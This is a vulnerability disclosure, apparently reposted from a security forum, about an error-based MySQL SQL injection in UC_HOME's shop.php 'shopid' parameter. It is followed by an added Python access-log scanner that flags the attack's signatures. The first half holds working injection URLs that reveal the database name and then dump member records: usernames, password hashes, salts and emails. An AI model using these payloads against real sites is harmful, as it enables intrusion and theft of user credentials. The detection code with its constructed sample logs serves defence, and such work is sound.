Original post: COG forum
http://forum.chowngroup.com/forum.php?mod=viewthread&tid=137
Vulnerable file: Shop.php
Vulnerable parameter: ?ac=view&shopid=
Vulnerability type: SQL Injection (MySQL error-based)
Exploit PoC:
1. Query the database name used by UC_HOME:
- http://xxoo.com/shop.php?ac=view&shopid=1 and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2. Using the database name obtained in step 1 (replace XXOO_UC_DB), inject further to extract member information:
- http://xxoo.com/shop.php?ac=view&shopid=1 and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0x27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- http://xxoo.com/shop.php?ac=view&shopid=50534 and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email) as char),0x27,0x7e) from ucenter.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
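As an added defensive example (not from the original post), the following Python check parses web access-log lines, picks out `shop.php?ac=view` requests whose `shopid` is not a plain integer, and tags the error-based signatures the PoC above relies on (`floor(rand(0)*2)` double-query, `group by`, `information_schema`, `concat`). The log lines and addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2012:10:01:02 +0800] "GET /shop.php?ac=view&shopid=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/May/2012:10:01:09 +0800] "GET /shop.php?ac=view&shopid=1%20and%20(select%201%20from(select%20count(*),concat((select%20database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 812
198.51.100.7 - - [10/May/2012:10:02:30 +0800] "GET /shop.php?ac=view&shopid=50534 HTTP/1.1" 200 4980
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the error-based technique used in the PoC.
SQLI_SIGNATURES = [
    ("double-query", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("group-by", re.compile(r"\bgroup\s+by\b", re.I)),
    ("information-schema", re.compile(r"information_schema", re.I)),
    ("concat", re.compile(r"\bconcat\s*\(", re.I)),
]


def analyse_request(url):
    """Return None for unrelated URLs, else a dict describing the shopid value."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if params.get("ac") != ["view"]:
        return None
    shopid = params.get("shopid", [""])[0]
    if re.fullmatch(r"\d+", shopid):  # the only legitimate shape for shopid
        return {"shopid": shopid, "malformed": False, "signatures": []}
    hits = [name for name, rx in SQLI_SIGNATURES if rx.search(shopid)]
    return {"shopid": shopid, "malformed": True, "signatures": hits}


def scan_log(text):
    """Yield (client ip, status, matched signatures) for suspicious shop.php hits."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m.group("url"))
        if finding and finding["malformed"]:
            alerts.append((m.group("ip"), m.group("status"), finding["signatures"]))
    return alerts
```

A 500 status on a flagged request is consistent with the error-based technique, where the database error itself carries the extracted value.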
Do not misuse!!!